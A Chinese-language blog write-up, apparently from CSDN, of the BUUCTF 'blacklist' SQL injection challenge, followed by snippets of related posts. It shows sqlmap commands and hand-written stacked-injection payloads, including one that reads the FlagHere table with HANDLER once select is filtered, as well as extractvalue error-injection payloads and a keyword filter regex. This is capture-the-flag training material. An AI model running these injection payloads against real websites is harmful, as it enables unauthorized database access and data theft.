buuctf:blacklistp

于 2023-03-29 20:21:03 发布
阅读量147 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fcz___/article/details/129834675
版权
文章描述了一次针对靶机的SQL注入攻击过程,首先通过sqlmap发现注入点并确定数据库为supersqli,由于WAF的存在,无法继续使用工具,于是采用手工堆叠注入方法,暴露表名FlagHere和字段flag。由于select被过滤,使用handler读取了表FlagHere的数据。
摘要由CSDN通过智能技术生成

打开靶机。在这里插入图片描述
我们输入1'闭合一下试试。

在这里插入图片描述
可以看到应该是sql注入。我们用sqlmap扫描一下。
命令:sqlmap -u http://207e83af-288c-42a0-9c66-270c519d0466.node4.buuoj.cn:81/?inject=1
请添加图片描述
可以看到存在注入点。我们爆库。命令:

sqlmap -u http://207e83af-288c-42a0-9c66-270c519d0466.node4.buuoj.cn:81/?inject=1 --dbs

请添加图片描述
可以看到爆出的数据库为:supersqli

往下的话就不能用sqlmap了因为有waf,我不会绕,我们手工注入。
已经知道数据库了,我们采用堆叠注入。爆表名:?inject=-1';use supersqli;show tables--+
后面的--+表示#的意思。
在这里插入图片描述
可以看到表名是FlagHere然后我们爆字段。?inject=-1';use supersqli;show columns from FlagHere--+
在这里插入图片描述
可以看到有一个flag字段。但是select被过滤了。无法继续堆叠注入。我们用handler读取。再知道表名是,可以用handler读取数据。格式为:handler 表名 open;handler 表名 read first;handler 表名 close;
所以我们payload:?inject=1’;handler FlagHere open;handler FlagHere read first;handler FlagHere close;
在这里插入图片描述
拿下。
养一下眼。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

寡人略秀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 928
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1646
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
buuctf-Blacklist
m0_62094846的博客
03-28 661
?inject=1' order by 2--+ 过滤了很多关键词,就有select,好像绕不过 试试报错注入 ?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+ 数据库:surpersqli 因为过滤了太多,报错注入不了,只能试试别的了 堆叠注入 ?inject=-1';use supersqli;show tables--+ 查出两个表:FlagHere,words 接下来查字段...
BUUCTF-Blacklist
m0_47571887的博客
11-10 696
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
buuctf blacklist
ANYOUZHEN的博客
05-26 311
这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1' 使用联合查询,构造payload: ?inject=1' union select 1,2--+ 过滤了许多东西: /set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i 其中的select被过滤掉了 尝试使用报错注入进行突破: ?inject=1' and extractvalue(1,concat(0x7e,(databa..
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1412
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
BUUCTF:[ISITDTU 2019]EasyPHP --- rce 超级异或,,,吐了,,,字符之间异或, 成型的异或payload!!!
Zero_Adam的博客
04-06 1646
目录:一、自己做:二、学的的三、学习WP1. 这里先来个不限制字符个数的关于这个%ff 以及异或的事情,咱们好好唠唠1.生成异或中间值的python脚本2. 看有字符限制的时候,:!!干了,,发现了一个更好多python脚本,,接着做题~。 一、自己做: <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) di
BUUCTF:LSB,ningen,FLAG
m0_61460513的博客
03-27 1003
目录 1.LSB 2.ningen 3.FLAG 1.LSB 下载并解压得到图片。 题目提示为LSB,使用StegSolve打开 使用按钮,观察结果,发现Red Green Blue plane0时图片上方出现异常 使用Analyse,选择Red Green Blue plane0,选择LSB模式,Previwe发现png文件,save bin保存为png文件 得到二维码图片,扫码得到flag cumtctf{1sb_i4_...
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4021
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
BUUCTF:[CISCN2019 华东南赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 896
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
buuctf-[GYCTF2020]Blacklist1(小宇特详解)
小宇的web博客
02-09 1641
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 695
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
[GYCTF2020]Blacklist
夜幕下的灯火阑珊的博客
05-12 895
知识点 堆叠注入 参考堆叠注入tips 查表名、列名、字段名 show databases; show tables; show columns from `table_name`; 本题使用HANDLER查看flag 1'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;#
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2650
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF[GYCTF2020]Blacklist
weixin_45253622的博客
05-22 325
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过。 可用的还有,or and unionshow 输入:1 or 1=1 无反应 输入:1' or '1' ='1如下: 字符型注入,由于show可用,所以我们想到堆叠注入: 1';show tables; 查看字段名, 1';show columns from FlagHere; 过滤机制过于强大,所以我们使用handler, HANDLER...OPEN语句打开一个表,使其可以使用...
buuctf [GYCTF2020]Blacklist
最新发布
m0_63883187的博客
01-14 133
不懂得欢迎私信交流
Buuctf [GYCTF2020]Blacklist
qq_53030229的博客
10-26 390
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、检查源码2、使用堆叠注入1、判断是否存在注入点2、使用堆叠注入3、获取flag 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 802
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
BUUCTF刷题记录(3)
bmth666的博客
03-20 3333
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值